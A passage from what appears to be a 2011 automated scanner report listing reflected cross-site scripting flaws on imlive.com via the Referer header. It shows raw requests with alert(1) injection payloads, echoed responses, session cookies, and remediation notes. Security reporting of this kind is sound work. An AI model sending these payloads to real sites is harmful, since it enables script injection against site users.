GET /forgot.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=9f31f'-alert(1)-'d8c094b7adb
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:47 GMT Connection: close Content-Length: 3308 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3d10'><script>alert(1)</script>76788ffdb68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /homepagems3.asp HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000 Referer: http://www.google.com/search?hl=en&q=e3d10'><script>alert(1)</script>76788ffdb68
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39448'><script>alert(1)</script>4985a3648d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hostmembers.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=39448'><script>alert(1)</script>4985a3648d9
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:16 GMT Connection: close Content-Length: 10795 Vary: Accept-Encoding
<HTML> <HEAD>
<TITLE>ImLive - Host Login</TITLE>
<meta name="description" content="Welcome, ImLive Hosts. Please login to live video chat about everything from friendship and romance ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/login.asp?host&lr=1107816009&ud=0&pe=login.asp&rf=http://www.google.com/search?hl=en^q=39448'><script>alert(1)</script>4985a3648d9&qs=host&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9543d'-alert(1)-'3fbf0fbae6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=9543d'-alert(1)-'3fbf0fbae6a
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:05 GMT Connection: close Content-Length: 39949 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/&rf=http://www.google.com/search?hl=en^q=9543d'-alert(1)-'3fbf0fbae6a&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd2e5'-alert(1)-'83f3da1d0da was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/adult-shows/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=dd2e5'-alert(1)-'83f3da1d0da
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:41 GMT Connection: close Content-Length: 25196 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... "text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/&rf=http://www.google.com/search?hl=en^q=dd2e5'-alert(1)-'83f3da1d0da&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50e28'-alert(1)-'4ef9bdb79a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=50e28'-alert(1)-'4ef9bdb79a0
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:23 GMT Connection: close Content-Length: 224507 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=50e28'-alert(1)-'4ef9bdb79a0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c00'-alert(1)-'13ed03de9eb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/categories/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=15c00'-alert(1)-'13ed03de9eb
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:34 GMT Connection: close Content-Length: 27209 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... cript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/&rf=http://www.google.com/search?hl=en^q=15c00'-alert(1)-'13ed03de9eb&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abdb3'-alert(1)-'17f2cec9909 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=abdb3'-alert(1)-'17f2cec9909
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:14 GMT Connection: close Content-Length: 40632 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=abdb3'-alert(1)-'17f2cec9909&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e389'-alert(1)-'41c0351c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=5e389'-alert(1)-'41c0351c2c2
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:31 GMT Connection: close Content-Length: 33186 Vary: Accept-Encoding
